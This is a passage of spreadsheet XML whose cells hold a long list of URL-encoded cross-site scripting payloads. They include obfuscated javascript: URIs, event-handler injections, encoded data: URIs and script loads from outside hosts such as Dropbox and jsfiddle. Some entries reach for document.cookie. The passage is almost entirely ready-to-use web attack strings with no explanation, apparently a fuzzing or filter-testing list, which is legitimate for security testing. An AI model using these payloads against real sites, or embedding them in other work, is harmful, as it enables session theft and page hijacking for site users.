        <v>%3Cimg%2Fsrc%3D%27http%3A%2F%2Fi.imgur.com%2FP8mL8.jpg%27%20onmouseover%3D%26Tab%3Bprompt%281%29</v>
      </c>
    </row>
    <row r="1309">
      <c r="A1309" s="3" t="s">
        <v>592</v>
      </c>
      <c r="B1309" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%2334%3B%26%2362%3B%3Csvg%3E%3Cstyle%3E%7B-o-link-source%26colon%3B%27%3Cbody%2Fonload%3Dconfirm%281%29%3E%27</v>
      </c>
    </row>
    <row r="1310">
      <c r="A1310" s="3" t="s">
        <v>593</v>
      </c>
      <c r="B1310" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%2313%3B%3Cblink%2F%26%2313%3B%20onmouseover%3Dpr%26%23x6F%3Bmp%26%23116%3B%281%29%3EOnMouseOver%20%7BFirefox%20%26%20Opera%7D</v>
      </c>
    </row>
    <row r="1311">
      <c r="A1311" s="3" t="s">
        <v>594</v>
      </c>
      <c r="B1311" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmarquee%20onstart%3D%27javascript%3Aalert%26%23x28%3B1%26%23x29%3B%27%3E%5E__%5E</v>
      </c>
    </row>
    <row r="1312">
      <c r="A1312" s="3" t="s">
        <v>595</v>
      </c>
      <c r="B1312" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%2Fstyle%3D%22width%3Aexpression%28confirm%281%29%29%22%3EX%3C%2Fdiv%3E%20%7BIE7%7D</v>
      </c>
    </row>
    <row r="1313">
      <c r="A1313" s="3" t="s">
        <v>1042</v>
      </c>
      <c r="B1313" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2F%2F%20src%3DjavaSCRIPT%26colon%3Balert%281%29</v>
      </c>
    </row>
    <row r="1314">
      <c r="A1314" s="3" t="s">
        <v>597</v>
      </c>
      <c r="B1314" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%2F%3Cform%2Faction%3Djavascript%26%23x3A%3Balert%26lpar%3Bdocument%26period%3Bcookie%26rpar%3B%3E%3Cinput%2Ftype%3D%27submit%27%3E%2F%2F</v>
      </c>
    </row>
    <row r="1315">
      <c r="A1315" s="3" t="s">
        <v>598</v>
      </c>
      <c r="B1315" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%2Aiframe%2Fsrc%2A%2F%3Ciframe%2Fsrc%3D%22%3Ciframe%2Fsrc%3D%40%22%2Fonload%3Dprompt%281%29%20%2F%2Aiframe%2Fsrc%2A%2F%3E</v>
      </c>
    </row>
    <row r="1316">
      <c r="A1316" s="3" t="s">
        <v>599</v>
      </c>
      <c r="B1316" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%2F%7C%5C%5C%20%3Cscript%20%2F%2F%7C%5C%5C%20src%3D%27https%3A%2F%2Fdl.dropbox.com%2Fu%2F13018058%2Fjs.js%27%3E%20%2F%2F%7C%5C%5C%20%3C%2Fscript%20%2F%2F%7C%5C%5C</v>
      </c>
    </row>
    <row r="1317">
      <c r="A1317" s="3" t="s">
        <v>600</v>
      </c>
      <c r="B1317" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Ffont%3E%2F%3Csvg%3E%3Cstyle%3E%7Bsrc%26%23x3A%3B%27%3Cstyle%2Fonload%3Dthis.onload%3Dconfirm%281%29%3E%27%3C%2Ffont%3E%2F%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="1318">
      <c r="A1318" s="3" t="s">
        <v>601</v>
      </c>
      <c r="B1318" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%2Fhref%3D%22javascript%3A%26%2313%3B%20javascript%3Aprompt%281%29%22%3E%3Cinput%20type%3D%22X%22%3E</v>
      </c>
    </row>
    <row r="1319">
      <c r="A1319" s="3" t="s">
        <v>602</v>
      </c>
      <c r="B1319" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fplaintext%5C%3E%3C%2F%7C%5C%3E%3Cplaintext%2Fonmouseover%3Dprompt%281%29</v>
      </c>
    </row>
    <row r="1320">
      <c r="A1320" s="3" t="s">
        <v>603</v>
      </c>
      <c r="B1320" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fsvg%3E%27%27%3Csvg%3E%3Cscript%20%27AQuickBrownFoxJumpsOverTheLazyDog%27%3Ealert%26%23x28%3B1%26%23x29%3B%20%7BOpera%7D</v>
      </c>
    </row>
    <row r="1321">
      <c r="A1321" s="3" t="s">
        <v>604</v>
      </c>
      <c r="B1321" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%26colon%3B%5Cu0061%26%23x6C%3B%26%23101%2572t%26lpar%3B1%26rpar%3B%22%3E%3Cbutton%3E</v>
      </c>
    </row>
    <row r="1322">
      <c r="A1322" s="3" t="s">
        <v>605</v>
      </c>
      <c r="B1322" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20onmouseover%3D%27alert%26lpar%3B1%26rpar%3B%27%3EDIV%3C%2Fdiv%3E</v>
      </c>
    </row>
    <row r="1323">
      <c r="A1323" s="3" t="s">
        <v>606</v>
      </c>
      <c r="B1323" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20style%3D%22position%3Aabsolute%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%22%20onmouseover%3D%22prompt%281%29%22%3E</v>
      </c>
    </row>
    <row r="1324">
      <c r="A1324" s="3" t="s">
        <v>607</v>
      </c>
      <c r="B1324" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22jAvAsCrIpT%26colon%3Balert%26lpar%3B1%26rpar%3B%22%3EX%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1325">
      <c r="A1325" s="3" t="s">
        <v>608</v>
      </c>
      <c r="B1325" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20src%3D%22http%3A%2F%2Fcorkami.googlecode.com%2Fsvn%2F%21svn%2Fbc%2F480%2Ftrunk%2Fmisc%2Fpdf%2Fhelloworld_js_X.pdf%22%3E</v>
      </c>
    </row>
    <row r="1326">
      <c r="A1326" s="3" t="s">
        <v>609</v>
      </c>
      <c r="B1326" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20data%3D%22http%3A%2F%2Fcorkami.googlecode.com%2Fsvn%2F%21svn%2Fbc%2F480%2Ftrunk%2Fmisc%2Fpdf%2Fhelloworld_js_X.pdf%22%3E</v>
      </c>
    </row>
    <row r="1327">
      <c r="A1327" s="3" t="s">
        <v>610</v>
      </c>
      <c r="B1327" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cvar%20onmouseover%3D%22prompt%281%29%22%3EOn%20Mouse%20Over%3C%2Fvar%3E</v>
      </c>
    </row>
    <row r="1328">
      <c r="A1328" s="3" t="s">
        <v>611</v>
      </c>
      <c r="B1328" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3Djavascript%26colon%3Balert%26lpar%3Bdocument%26period%3Bcookie%26rpar%3B%3EClick%20Here%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1329">
      <c r="A1329" s="3" t="s">
        <v>612</v>
      </c>
      <c r="B1329" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%22%2F%22%20%3D_%3D%22%20title%3D%22onerror%3D%27prompt%281%29%27%22%3E</v>
      </c>
    </row>
    <row r="1330">
      <c r="A1330" s="3" t="s">
        <v>613</v>
      </c>
      <c r="B1330" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%25%3C%21--%27%25%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%20--%3E</v>
      </c>
    </row>
    <row r="1331">
      <c r="A1331" s="3" t="s">
        <v>614</v>
      </c>
      <c r="B1331" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D%22data%3Atext%2Fjavascript%2Calert%281%29%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1332">
      <c r="A1332" s="3" t="s">
        <v>615</v>
      </c>
      <c r="B1332" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2Fsrc%20%5C%2F%5C%2Fonload%20%3D%20prompt%281%29</v>
      </c>
    </row>
    <row r="1333">
      <c r="A1333" s="3" t="s">
        <v>616</v>
      </c>
      <c r="B1333" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2Fonreadystatechange%3Dalert%281%29</v>
      </c>
    </row>
    <row r="1334">
      <c r="A1334" s="3" t="s">
        <v>617</v>
      </c>
      <c r="B1334" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%2Fonload%3Dalert%281%29</v>
      </c>
    </row>
    <row r="1335">
      <c r="A1335" s="3" t="s">
        <v>618</v>
      </c>
      <c r="B1335" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%20value%3D%3C%3E%3Ciframe%2Fsrc%3Djavascript%3Aconfirm%281%29</v>
      </c>
    </row>
    <row r="1336">
      <c r="A1336" s="3" t="s">
        <v>619</v>
      </c>
      <c r="B1336" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%20type%3D%22text%22%20value%3D%60%60%20%3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3EX%3C%2Fdiv%3E</v>
      </c>
    </row>
    <row r="1337">
      <c r="A1337" s="3" t="s">
        <v>620</v>
      </c>
      <c r="B1337" s="4" t="str">
        <f t="shared" si="1"/>
        <v>http%3A%2F%2Fwww.%3Cscript%3Ealert%281%29%3C%2Fscript%20.com</v>
      </c>
    </row>
    <row r="1338">
      <c r="A1338" s="3" t="s">
        <v>621</v>
      </c>
      <c r="B1338" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3Dj%26NewLine%3B%26Tab%3Ba%26NewLine%3B%26Tab%3B%26Tab%3Bv%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3Ba%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Bs%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Bc%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Br%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Bi%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Bp%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Bt%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26colon%3Ba%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Bl%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Be%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Br%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Bt%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B28%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B1%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%2529%3E%3C%2Fiframe%3E</v>
      </c>
    </row>
    <row r="1339">
      <c r="A1339" s="3" t="s">
        <v>622</v>
      </c>
      <c r="B1339" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cscript%20%3F%3Ealert%281%29</v>
      </c>
    </row>
    <row r="1340">
      <c r="A1340" s="3" t="s">
        <v>623</v>
      </c>
      <c r="B1340" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3Dj%26Tab%3Ba%26Tab%3Bv%26Tab%3Ba%26Tab%3Bs%26Tab%3Bc%26Tab%3Br%26Tab%3Bi%26Tab%3Bp%26Tab%3Bt%26Tab%3B%3Aa%26Tab%3Bl%26Tab%3Be%26Tab%3Br%26Tab%3Bt%26Tab%3B%2528%26Tab%3B1%26Tab%3B%2529%3E%3C%2Fiframe%3E</v>
      </c>
    </row>
    <row r="1341">
      <c r="A1341" s="3" t="s">
        <v>624</v>
      </c>
      <c r="B1341" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%60xx%3Axx%60onerror%3Dalert%281%29%3E</v>
      </c>
    </row>
    <row r="1342">
      <c r="A1342" s="3" t="s">
        <v>625</v>
      </c>
      <c r="B1342" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20type%3D%22text%2Fx-scriptlet%22%20data%3D%22http%3A%2F%2Fjsfiddle.net%2FXLE63%2F%20%22%3E%3C%2Fobject%3E</v>
      </c>
    </row>
    <row r="1343">
      <c r="A1343" s="3" t="s">
        <v>626</v>
      </c>
      <c r="B1343" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Bjavascript%26colon%3Balert%281%29%22%2F%3E</v>
      </c>
    </row>
    <row r="1344">
      <c r="A1344" s="3" t="s">
        <v>627</v>
      </c>
      <c r="B1344" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmath%3E%3Ca%20xlink%3Ahref%3D%22%2F%2Fjsfiddle.net%2Ft846h%2F%22%3Eclick</v>
      </c>
    </row>
    <row r="1345">
      <c r="A1345" s="3" t="s">
        <v>628</v>
      </c>
      <c r="B1345" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20code%3D%22http%3A%2F%2Fbusinessinfo.co.uk%2Flabs%2Fxss%2Fxss.swf%22%20allowscriptaccess%3Dalways%3E</v>
      </c>
    </row>
    <row r="1346">
      <c r="A1346" s="3" t="s">
        <v>629</v>
      </c>
      <c r="B1346" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%20contentScriptType%3Dtext%2Fvbs%3E%3Cscript%3EMsgBox%2B1</v>
      </c>
    </row>
    <row r="1347">
      <c r="A1347" s="3" t="s">
        <v>630</v>
      </c>
      <c r="B1347" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22data%3Atext%2Fhtml%3Bbase64_%2C%3Csvg%2Fonload%3D%5Cu0061%26%23x6C%3B%26%23101%2572t%281%29%3E%22%3EX%3C%2Fa</v>
      </c>
    </row>
    <row r="1348">
      <c r="A1348" s="3" t="s">
        <v>631</v>
      </c>
      <c r="B1348" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2Fonreadystatechange%3D%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074%28%27%5Cu0061%27%29%20worksinIE%3E</v>
      </c>
    </row>
    <row r="1349">
      <c r="A1349" s="3" t="s">
        <v>632</v>
      </c>
      <c r="B1349" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%7E%27%5Cu0061%27%20%3B%20%5Cu0074%5Cu0068%5Cu0072%5Cu006F%5Cu0077%20%7E%20%5Cu0074%5Cu0068%5Cu0069%5Cu0073.%20%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074%28%7E%27%5Cu0061%27%29%3C%2Fscript%20U%2B</v>
      </c>
    </row>
    <row r="1350">
      <c r="A1350" s="3" t="s">
        <v>633</v>
      </c>
      <c r="B1350" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%2Fsrc%3D%22data%26colon%3Btext%252Fj%5Cu0061v%5Cu0061script%2C%5Cu0061lert%28%27%5Cu0061%27%29%22%3E%3C%2Fscript%20a%3D%5Cu0061%20%26%20%2F%3D%252F</v>
      </c>
    </row>
    <row r="1351">
      <c r="A1351" s="3" t="s">
        <v>634</v>
      </c>
      <c r="B1351" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%2Fsrc%3Ddata%26colon%3Btext%2Fj%5Cu0061v%5Cu0061%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%2C%5Cu0061%256C%2565%2572%2574%28%2FXSS%2F%29%3E%3C%2Fscript</v>
      </c>
    </row>
    <row r="1352">
      <c r="A1352" s="3" t="s">
        <v>635</v>
      </c>
      <c r="B1352" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20data%3Djavascript%26colon%3B%5Cu0061%26%23x6C%3B%26%23101%2572t%281%29%3E</v>
      </c>
    </row>
    <row r="1353">
      <c r="A1353" s="3" t="s">
        <v>636</v>
      </c>
      <c r="B1353" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%2B-%2B-1-%2B-%2Balert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1354">
      <c r="A1354" s="3" t="s">
        <v>637</v>
      </c>
      <c r="B1354" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%2Fonload%3D%26lt%3B%21--%26gt%3B%26%2310alert%281%29%3E</v>
      </c>
    </row>
    <row r="1355">
      <c r="A1355" s="3" t="s">
        <v>638</v>
      </c>
      <c r="B1355" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20itworksinallbrowsers%3E%2F%2A%3Cscript%2A%20%2A%2Falert%281%29%3C%2Fscript</v>
      </c>
    </row>
    <row r="1356">
      <c r="A1356" s="3" t="s">
        <v>639</v>
      </c>
      <c r="B1356" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%20%3Fitworksonchrome%3F%5C%2Fonerror%20%3D%20alert%281%29</v>
      </c>
    </row>
    <row r="1357">
      <c r="A1357" s="3" t="s">
        <v>640</v>
      </c>
      <c r="B1357" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cscript%3E%2F%2F%26NewLine%3Bconfirm%281%29%3B%3C%2Fscript%20%3C%2Fsvg%3E</v>
      </c>
    </row>
    <row r="1358">
      <c r="A1358" s="3" t="s">
        <v>641</v>
      </c>
      <c r="B1358" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cscript%20onlypossibleinopera%3A-%29%3E%20alert%281%29</v>
      </c>
    </row>
    <row r="1359">
      <c r="A1359" s="3" t="s">
        <v>642</v>
      </c>
      <c r="B1359" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20aa%20aaa%20aaaa%20aaaaa%20aaaaaa%20aaaaaaa%20aaaaaaaa%20aaaaaaaaa%20aaaaaaaaaa%20href%3Dj%26%2397v%26%2397script%26%23x3A%3B%26%2397lert%281%29%3EClickMe</v>
      </c>
    </row>
    <row r="1360">
      <c r="A1360" s="3" t="s">
        <v>643</v>
      </c>
      <c r="B1360" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20x%3E%20alert%281%29%20%3C%2Fscript%201%3D2</v>
      </c>
    </row>
    <row r="1361">
      <c r="A1361" s="3" t="s">
        <v>644</v>
      </c>
      <c r="B1361" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3E%20style%3D%22x%3A%22%3E</v>
      </c>
    </row>
    <row r="1362">
      <c r="A1362" s="3" t="s">
        <v>645</v>
      </c>
      <c r="B1362" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C--%60%3Cimg%2Fsrc%3D%60%20onerror%3Dalert%281%29%3E%20--%21%3E</v>
      </c>
    </row>
    <row r="1363">
      <c r="A1363" s="3" t="s">
        <v>646</v>
      </c>
      <c r="B1363" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%2Fsrc%3D%26%23100%26%2397%26%23116%26%2397%3Atext%2F%26%23x6a%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x000070%26%23x074%2C%26%23x0061%3B%26%23x06c%3B%26%23x0065%3B%26%23x00000072%3B%26%23x00074%3B%281%29%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1364">
      <c r="A1364" s="3" t="s">
        <v>647</v>
      </c>
      <c r="B1364" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22position%3Aabsolute%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%22%20onmouseover%3D%22prompt%281%29%22%20onclick%3D%22alert%281%29%22%3Ex%3C%2Fbutton%3E</v>
      </c>
    </row>
    <row r="1365">
      <c r="A1365" s="3" t="s">
        <v>648</v>
      </c>
      <c r="B1365" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Cimg%20src%3Dx%20onerror%3Dwindow.open%28%27https%3A%2F%2Fwww.google.com%2F%27%29%3B%3E%3Cform%3E%3Cbutton%20formaction%3Djavascript%26colon%3Balert%281%29%3ECLICKME%3Cmath%3E%3Ca%20xlink%3Ahref%3D%2F%2Fjsfiddle.net%2Ft846h%2F%22%3Eclick</v>
      </c>
    </row>
    <row r="1366">
      <c r="A1366" s="3" t="s">
        <v>649</v>
      </c>
      <c r="B1366" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20data%3Ddata%3Atext%2Fhtml%3Bbase64%2CPHN2Zy9vbmxvYWQ9YWxlcnQoMik%2B%3E%3C%2Fobject%3E</v>
      </c>
    </row>
    <row r="1367">
      <c r="A1367" s="3" t="s">
        <v>650</v>
      </c>
      <c r="B1367" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3D%22data%3Atext%2Fhtml%2C%253C%2573%2563%2572%2569%2570%2574%253E%2561%256C%2565%2572%2574%2528%2531%2529%253C%252F%2573%2563%2572%2569%2570%2574%253E%22%3E%3C%2Fiframe%3E</v>
      </c>
    </row>
    <row r="1368">
      <c r="A1368" s="3" t="s">
        <v>651</v>
      </c>
      <c r="B1368" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22data%3Atext%2Fhtml%3Bblabla%2C%26%2360%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2332%26%23115%26%23114%26%2399%26%2361%26%2334%26%23104%26%23116%26%23116%26%23112%26%2358%26%2347%26%2347%26%23115%26%23116%26%23101%26%23114%26%23110%26%23101%26%23102%26%2397%26%23109%26%23105%26%23108%26%23121%26%2346%26%23110%26%23101%26%23116%26%2347%26%23102%26%23111%26%23111%26%2346%26%23106%26%23115%26%2334%26%2362%26%2360%26%2347%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2362%26%238203%22%3EClick%20Me%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1369">
      <c r="A1369" s="3" t="s">
        <v>24</v>
      </c>
      <c r="B1369" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx20type%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1370">
      <c r="A1370" s="3" t="s">
        <v>26</v>
      </c>
      <c r="B1370" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx3Etype%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1371">
      <c r="A1371" s="3" t="s">
        <v>27</v>
      </c>
      <c r="B1371" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx0Dtype%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1372">
      <c r="A1372" s="3" t="s">
        <v>28</v>
      </c>
      <c r="B1372" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx09type%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1373">
      <c r="A1373" s="3" t="s">
        <v>29</v>
      </c>
      <c r="B1373" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx0Ctype%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1374">
      <c r="A1374" s="3" t="s">
        <v>30</v>
      </c>
      <c r="B1374" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx2Ftype%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1375">
      <c r="A1375" s="3" t="s">
        <v>31</v>
      </c>
      <c r="B1375" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx0Atype%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1376">
      <c r="A1376" s="5" t="s">
        <v>32</v>
      </c>
      <c r="B1376" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%3E%3C%5Cx3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1377">
      <c r="A1377" s="5" t="s">
        <v>33</v>
      </c>
      <c r="B1377" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%3E%3C%5Cx00script%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1378">
      <c r="A1378" s="3" t="s">
        <v>34</v>
      </c>
      <c r="B1378" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D1%20href%3D1%20onerror%3D%22javascript%3Aalert%281%29%22%3E%3C%2Fimg%3E</v>
      </c>
    </row>
    <row r="1379">
      <c r="A1379" s="3" t="s">
        <v>35</v>
      </c>
      <c r="B1379" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Caudio%20src%3D1%20href%3D1%20onerror%3D%22javascript%3Aalert%281%29%22%3E%3C%2Faudio%3E</v>
      </c>
    </row>
    <row r="1380">
      <c r="A1380" s="3" t="s">
        <v>36</v>
      </c>
      <c r="B1380" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cvideo%20src%3D1%20href%3D1%20onerror%3D%22javascript%3Aalert%281%29%22%3E%3C%2Fvideo%3E</v>
      </c>
    </row>
    <row r="1381">
      <c r="A1381" s="3" t="s">
        <v>37</v>
      </c>
      <c r="B1381" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20src%3D1%20href%3D1%20onerror%3D%22javascript%3Aalert%281%29%22%3E%3C%2Fbody%3E</v>
      </c>
    </row>
    <row r="1382">
      <c r="A1382" s="3" t="s">
        <v>38</v>
      </c>
      <c r="B1382" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimage%20src%3D1%20href%3D1%20onerror%3D%22javascript%3Aalert%281%29%22%3E%3C%2Fimage%3E</v>
      </c>
    </row>
    <row r="1383">
      <c r="A1383" s="3" t="s">
        <v>39</v>
      </c>
      <c r="B1383" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20src%3D1%20href%3D1%20onerror%3D%22javascript%3Aalert%281%29%22%3E%3C%2Fobject%3E</v>
      </c>
    </row>
    <row r="1384">
      <c r="A1384" s="3" t="s">
        <v>40</v>
      </c>
      <c r="B1384" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D1%20href%3D1%20onerror%3D%22javascript%3Aalert%281%29%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1385">
      <c r="A1385" s="3" t="s">
        <v>41</v>
      </c>
      <c r="B1385" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%20onResize%20svg%20onResize%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fsvg%20onResize%3E</v>
      </c>
    </row>
    <row r="1386">
      <c r="A1386" s="3" t="s">
        <v>42</v>
      </c>
      <c r="B1386" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ctitle%20onPropertyChange%20title%20onPropertyChange%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Ftitle%20onPropertyChange%3E</v>
      </c>
    </row>
    <row r="1387">
      <c r="A1387" s="3" t="s">
        <v>43</v>
      </c>
      <c r="B1387" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20onLoad%20iframe%20onLoad%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fiframe%20onLoad%3E</v>
      </c>
    </row>
    <row r="1388">
      <c r="A1388" s="3" t="s">
        <v>44</v>
      </c>
